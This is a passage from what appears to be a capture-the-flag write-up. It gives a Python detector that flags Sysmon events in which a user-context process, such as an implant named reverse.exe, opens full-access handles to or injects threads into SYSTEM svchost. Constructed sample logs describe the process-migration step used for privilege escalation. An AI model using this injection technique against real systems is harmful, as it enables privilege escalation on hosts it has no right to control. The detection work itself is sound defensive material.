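# Processes that legitimately create threads in other processes; tune per host.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe",
                   r"c:\windows\system32\wininit.exe"}

KV_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_record(line):
    """Turn one key="value" record into a dict."""
    return dict(KV_RE.findall(line))


def is_suspicious(rec):
    """True when a non-SYSTEM user gains injection capability over a SYSTEM process."""
    src_user, dst_user = rec.get("SourceUser", ""), rec.get("TargetUser", "")
    if rec.get("SourceImage", "").lower() in ALLOWED_SOURCES:
        return False
    if src_user == dst_user or dst_user not in SYSTEM_USERS:
        return False
    if rec.get("EventID") == "8":          # a remote thread was actually created
        return True
    if rec.get("EventID") == "10":         # handle opened: check the rights granted
        granted = int(rec.get("GrantedAccess", "0"), 16)
        return (granted & INJECT_MASK) == INJECT_MASK
    return False


def detect(lines):
    """Return (EventID, src_pid, dst_pid, src_user, dst_image) per suspicious record."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        if is_suspicious(rec):
            alerts.append((rec["EventID"], rec.get("SourceProcessId"),
                           rec.get("TargetProcessId"), rec.get("SourceUser"),
                           rec.get("TargetImage")))
    return alerts


# Constructed records (paths assumed; PIDs/user taken from the write-up).
SAMPLE_EVENTS = [
    # full-access handle from the user's implant into a SYSTEM svchost
    r'EventID="10" SourceProcessId="996" SourceImage="C:\Temp\reverse.exe" '
    r'SourceUser="POV\alaading" TargetProcessId="776" '
    r'TargetImage="C:\Windows\System32\svchost.exe" TargetUser="NT AUTHORITY\SYSTEM" '
    r'GrantedAccess="0x1FFFFF"',
    # the remote thread that carries the migration
    r'EventID="8" SourceProcessId="996" SourceImage="C:\Temp\reverse.exe" '
    r'SourceUser="POV\alaading" TargetProcessId="776" '
    r'TargetImage="C:\Windows\System32\svchost.exe" TargetUser="NT AUTHORITY\SYSTEM"',
    # benign: csrss creating threads in another SYSTEM process
    r'EventID="8" SourceProcessId="376" SourceImage="C:\Windows\System32\csrss.exe" '
    r'SourceUser="NT AUTHORITY\SYSTEM" TargetProcessId="620" '
    r'TargetImage="C:\Windows\System32\services.exe" TargetUser="NT AUTHORITY\SYSTEM"',
    # benign: the user's PowerShell querying its own conhost
    r'EventID="10" SourceProcessId="4288" '
    r'SourceImage="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'SourceUser="POV\alaading" TargetProcessId="4360" '
    r'TargetImage="C:\Windows\System32\conhost.exe" TargetUser="POV\alaading" '
    r'GrantedAccess="0x1000"',
    # benign: read-only query of a SYSTEM process (PROCESS_QUERY_LIMITED_INFORMATION)
    r'EventID="10" SourceProcessId="4288" '
    r'SourceImage="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'SourceUser="POV\alaading" TargetProcessId="776" '
    r'TargetImage="C:\Windows\System32\svchost.exe" TargetUser="NT AUTHORITY\SYSTEM" '
    r'GrantedAccess="0x1000"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT", alert)
```

The GrantedAccess mask is what keeps Event ID 10 usable: read-only handles (0x1000, 0x1400) to SYSTEM processes are opened constantly by task managers and monitoring agents, while a handle that carries VM_WRITE plus CREATE_THREAD from a user-context process is rare enough to page on.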

Summary

With that, privilege escalation succeeded and I got Administrator rights.
It was a fun box that expanded my lateral movement repertoire!

As always, I hope this helps my fellow security engineers.
